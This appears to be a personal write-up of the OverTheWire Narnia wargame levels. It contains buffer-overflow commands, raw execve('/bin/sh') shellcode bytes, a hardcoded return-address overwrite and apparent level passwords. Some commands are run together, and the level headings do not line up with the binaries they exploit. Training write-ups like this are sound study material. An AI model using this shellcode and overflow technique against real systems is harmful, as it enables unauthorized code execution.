wargame-narnia#
ssh addr: narnia0@narnia.labs.overthewire.org
url: http://overthewire.org/wargames/narnia/
--[ Tips ]--
This machine has a 64bit processor and many security-features enabled by default, although ASLR has been switched off. The following compiler flags might be interesting:
-m32 compile for 32bit
-fno-stack-protector disable ProPolice
-Wl,-z,norelro disable relro
In addition, the execstack tool can be used to flag the stack as executable on ELF binaries.
Finally, network-access is limited for most levels by a local firewall.
测试 shellcode:#
gcc -fno-stack-protector -z execstack -m32 shellcodetest.c -o shellcodetest
生成 shellcode#
写出 xxx.asm
nasm -f elf32 xxx.asm -o xxx.old -m elf_i386 -o xxx xxx.oobjdump -d xxx从输出中获得 shellcode 当然也可以写个工具提取考虑一下让
.text段可写?objcopy --writable-text -O elf32-i386 xxx xxx1似乎没有作用...
更改的系统值存档#
/proc/sys/kernel/randomize_va_space= 2
narnia0#
flag: narnia0
narnia1#
flag: efeidiedae
需要覆盖val变量, 注意管道关闭后程序也会随着关闭因此需要用
cat 继续向程序传递内容
$ (python -c "print('aaaaaaaaaaaaaaaaaaaa\xef\xbe\xad\xde')"; cat) | /narnia/narnia0
# 进入 sh 后执行
$ cat /etc/narnia_pass/narnia1
narnia2#
flag: nairiepecu
程序直接把环境变量 $EGG 的内容当成函数执行了,所以要在 $EGG
中插入程序。
这次需要真正的 shellcode 了, shellcode 见 shell.asm, 将生成的
shellcode 导入 EGG 变量, 直接执行 ./narnia2 即可.
shellcode: shell.asm
$ export EGG=$(python -c "print('\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42')")
$ ./narnia1
narnia3#
查看环境变量地址: (gdb) x/s *((char **)environ + 1), 结果
0xffffd8a1: "XDG_SESSION_ID=76296"
$ export XDG_SESSION_ID=$(python -c "print('\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42')")
./narnia2 $(python -c "print('a' * 140 + '\x55\xd8\xff\xff')")
如果你有任何意见,请在此评论。 如果你留下了电子邮箱,我可能会通过 回复你。